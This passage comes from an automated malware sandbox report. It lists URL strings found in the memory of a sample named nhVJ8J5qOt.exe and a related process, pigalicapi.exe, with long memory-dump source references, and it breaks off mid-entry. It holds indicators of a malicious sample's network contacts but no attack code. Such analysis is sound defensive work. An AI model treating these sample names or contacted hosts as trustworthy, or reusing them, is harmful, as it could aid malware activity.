                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076D5000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/Q
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/e
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.speelhal.net/graphy
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/M
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/7
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/a
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/pData
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/ystem32
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.829303638.0000000005CFD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/$
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/P
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.t-tre.com/h
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tc17.com/$
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709547478.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.templestreet.ie
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.transsib.com/(
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tvtools.fi/K
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tyrns.com/c
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/=
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.829229949.0000000004FCD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/N
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/U
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000768C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/r?
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usadig.com/s
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com//
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valdal.com/b
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/172-appartement-a-vendre-lille-30534
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/174-appartement-a-vendre-grenoble-30514
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, 